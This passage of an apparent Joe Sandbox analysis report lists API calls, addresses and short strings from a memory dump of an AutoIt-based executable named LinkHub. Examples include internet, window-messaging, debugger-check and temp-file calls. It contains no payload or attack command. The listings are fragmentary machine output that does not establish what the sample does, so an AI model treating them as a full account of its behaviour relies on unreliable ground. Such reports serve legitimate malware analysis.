                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                    • String ID:
                                                                    • API String ID: 1539411459-0
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 00C721BC
                                                                    • SetTextColor.GDI32(?,?), ref: 00C721C6
                                                                    • SetBkMode.GDI32(?,00000001), ref: 00C721D9
                                                                    • GetStockObject.GDI32(00000005), ref: 00C721E1
                                                                    Similarity
                                                                    • API ID: Color$ModeObjectStockText
                                                                    • String ID:
                                                                    • API String ID: 4037423528-0
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 00CCEC36
                                                                    • GetDC.USER32(00000000), ref: 00CCEC40
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CCEC60
                                                                    • ReleaseDC.USER32(?), ref: 00CCEC81
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 00CCEC4A
                                                                    • GetDC.USER32(00000000), ref: 00CCEC54
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CCEC60
                                                                    • ReleaseDC.USER32(?), ref: 00CCEC81
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    APIs
                                                                      • Part of subcall function 00C741EA: _wcslen.LIBCMT ref: 00C741EF
                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00CE5919
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Connection_wcslen
                                                                    • String ID: *$LPT
                                                                    • API String ID: 1725874428-3443410124
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00C9E67D
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ErrorHandling__start
                                                                    • String ID: pow
                                                                    • API String ID: 3213639722-2276729525
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #
                                                                    • API String ID: 0-1885708031
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 00C8F6DB
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C8F6F4
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: BuffCharUpper_wcslen
                                                                    • String ID: CALLARGARRAY
                                                                    • API String ID: 157775604-1150593374
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00CEDB75
                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00CEDB7F
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CrackInternet_wcslen
                                                                    • String ID: |
                                                                    • API String ID: 596671847-2343686810
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00D040BD
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00D040F8
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Window$DestroyMove
                                                                    • String ID: static
                                                                    • API String ID: 2139405536-2160076837
                                                                    APIs
                                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00D050BD
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D050D2
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '
                                                                    • API String ID: 3850602802-1997036262
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D03D18
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D03D23
                                                                    Strings
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
APIs
  • Part of subcall function 00C77873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C778B1
  • Part of subcall function 00C77873: GetStockObject.GDI32(00000011), ref: 00C778C5
  • Part of subcall function 00C77873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C778CF
• GetWindowRect.USER32(00000000,?), ref: 00D04216
• GetSysColor.USER32(00000012), ref: 00D04230
Strings
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CED7C2
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CED7EB
Strings
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
APIs
  • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
• CharUpperBuffW.USER32(?,?,?), ref: 00CD761D
• _wcslen.LIBCMT ref: 00CD7629
Strings
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: STOP
• API String ID: 1256254125-2411985666
APIs
  • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
  • Part of subcall function 00CD45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00CD4620
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00CD2699
Strings
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
APIs
  • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
  • Part of subcall function 00CD45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00CD4620
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00CD2593
Strings
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
APIs
  • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
  • Part of subcall function 00CD45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00CD4620
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00CD2615
Strings
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
APIs
  • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
  • Part of subcall function 00CD45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00CD4620
• SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00CD2720
Strings
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00CD146F
Strings
Similarity
• API ID: Message
• String ID: AutoIt$Error allocating memory.
• API String ID: 2030045667-4017498283
APIs
  • Part of subcall function 00C8FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C910E2,?,?,?,00C7100A), ref: 00C8FAD9
• IsDebuggerPresent.KERNEL32(?,?,?,00C7100A), ref: 00C910E6
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C7100A), ref: 00C910F5
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C910F0
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 55579361-631824599
APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00CE39F0
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00CE3A05
Strings
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D02E08
• PostMessageW.USER32(00000000), ref: 00D02E0F
  • Part of subcall function 00CDF292: Sleep.KERNEL32 ref: 00CDF30A
Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D02DC8
                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00D02DDB
                                                                      • Part of subcall function 00CDF292: Sleep.KERNEL32 ref: 00CDF30A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00CAC213
                                                                    • GetLastError.KERNEL32 ref: 00CAC221
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CAC27C
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1717984340-0